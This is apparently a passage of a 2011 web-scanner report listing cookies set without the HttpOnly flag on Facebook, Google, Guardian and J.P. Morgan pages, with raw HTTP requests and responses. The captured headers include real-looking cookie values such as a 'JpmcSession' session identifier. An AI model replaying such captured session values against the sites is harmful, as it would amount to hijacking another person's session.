The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=41jA_; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=41jA_; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 01:06:40 GMT Content-Length: 11422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.filamentgroup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=49DB682DE70C7979; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.firstusa.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xcards4/common/weblinking/weblinking.html HTTP/1.1 Host: www.firstusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:06:46 GMT Content-length: 5936 Content-type: text/html Set-Cookie: v1st=49DB682DE70C7979; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.firstusa.com Last-modified: Thu, 16 Dec 2010 13:58:38 GMT Etag: "1730-4d0a1b0e" Accept-ranges: bytes Connection: close
<html><head><title>Important Information on Weblinking from Chase</title> <link href="http://www.bankone.com/bolStyle.css" rel="stylesheet" type="text/css"> <SCRIPT Language="javascript" TYPE="text/j ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /finance HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /setprefs?sig=0_wmOEOqCEugI_DX4CRMM9-gOiSPQ=&suggon=2&prev=http://www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dipboard%2Bsoftware HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://www.google.com/search?sou ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
GALX=-qUnohNObFQ;Path=/accounts;Secure
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /accounts/Login HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The following cookie was issued by the application and does not have the HttpOnly flag set:
GALX=DLDUrVQYtAM;Path=/accounts;Secure
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /accounts/ServiceLogin HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business/2011/jan/11/offshore-oil-industry-white-house HTTP/1.1 Host: www.guardian.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:15:50 GMT Server: Apache X-GU-jas: 07-16121 X-GU-PageRenderer: DefaultPageRenderer Content-Language: en Content-Type: text/html; charset=UTF-8 Set-Cookie: GU_MU=VFVvQnhRcjZERHdBQUNoYlFSUUFBQUJafEkxMytueWM9; path=/; domain=.guardian.co.uk; expires=Sun, 31-Jan-2021 01:15:49 GMT Set-Cookie: GU_LOCATION=dXNhOjU6dHg6NDpkYWxsYXM6Mzo2MjM6YnJvYWRiYW5kOiAzMi43ODc6LTk2Ljc5OUA0NzI1NDI3MTgzMTgzMjE1MjMzMTk3MTM1OTcyNjIyMTAxNzUyOQ==; path=/; domain=.guardian.co.uk; expires=Thu, 24-Feb-2011 01:15:49 GMT Vary: Accept-Encoding,User-Agent X-GU-httpd: 03 P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC" Connection: close Content-Length: 98316
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" l ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.ibsnetaccess.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<HTML> <HEAD> <TITLE>FIA Card Services Net Access</TITLE> <META NAME = "Keywords" CONTENT = "FIA Card Services, FIA card services, net access, FIA Card Services Net Access, FIA card services ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /css/lightview.css HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:44 GMT Server: Apache Last-Modified: Wed, 04 Aug 2010 00:40:29 GMT ETag: "8e70c-2560-ae2df940" Accept-Ranges: bytes Content-Length: 9568 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: text/css
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /emetrics/s_code.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:11 GMT Server: Apache Last-Modified: Fri, 12 Nov 2010 20:44:49 GMT ETag: "188c2-9b4f-29579240" Accept-Ranges: bytes Content-Length: 39759 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
/* SiteCatalyst code version: H.21. Copyright 1996-2010 Adobe, Inc. All Rights Reserved. More info available at http://www.omniture.com */ /* Report suite for J.P. Morgan site */
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:24 GMT Server: Apache Last-Modified: Mon, 18 Aug 2008 20:30:58 GMT ETag: "47c5-37e-d94d8480" Accept-Ranges: bytes Content-Length: 894 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: text/plain
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/bkgrd_container_2008.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:11 GMT Server: Apache Last-Modified: Fri, 08 Aug 2008 13:36:34 GMT ETag: "72aba-5958-e4e13c80" Accept-Ranges: bytes Content-Length: 22872 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/client_pixel.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:17 GMT Server: Apache Last-Modified: Wed, 16 Jul 2008 21:50:44 GMT ETag: "72abb-156-1dceb500" Accept-Ranges: bytes Content-Length: 342 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/dotted_line.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:12 GMT Server: Apache Last-Modified: Thu, 07 Aug 2008 20:48:02 GMT ETag: "72ac1-469-ce156480" Accept-Ranges: bytes Content-Length: 1129 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/headers/hdr_client_logon_2008.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:16 GMT Server: Apache Last-Modified: Wed, 16 Jul 2008 21:13:58 GMT ETag: "6617e-548-9a51d180" Accept-Ranges: bytes Content-Length: 1352 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/headers/hdr_news.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:17 GMT Server: Apache Last-Modified: Wed, 16 Jul 2008 21:13:58 GMT ETag: "6617d-9cb-9a51d180" Accept-Ranges: bytes Content-Length: 2507 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/home_corporations.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Apache Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT ETag: "32aa92-1918-5d889a40" Accept-Ranges: bytes Content-Length: 6424 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/home_fininst.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Apache Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT ETag: "32aa93-22ba-5d889a40" Accept-Ranges: bytes Content-Length: 8890 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/home_individuals.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:15 GMT Server: Apache Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT ETag: "32aa96-1a1c-5d889a40" Accept-Ranges: bytes Content-Length: 6684 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/home_publicsector.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Apache Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT ETag: "32aa95-1a3c-5d889a40" Accept-Ranges: bytes Content-Length: 6716 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/home_smallbus.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Apache Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT ETag: "32aa94-219a-5d889a40" Accept-Ranges: bytes Content-Length: 8602 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/img1.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:15 GMT Server: Apache Last-Modified: Fri, 22 Aug 2008 17:37:20 GMT ETag: "32a789-fbc-e3b4f400" Accept-Ranges: bytes Content-Length: 4028 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
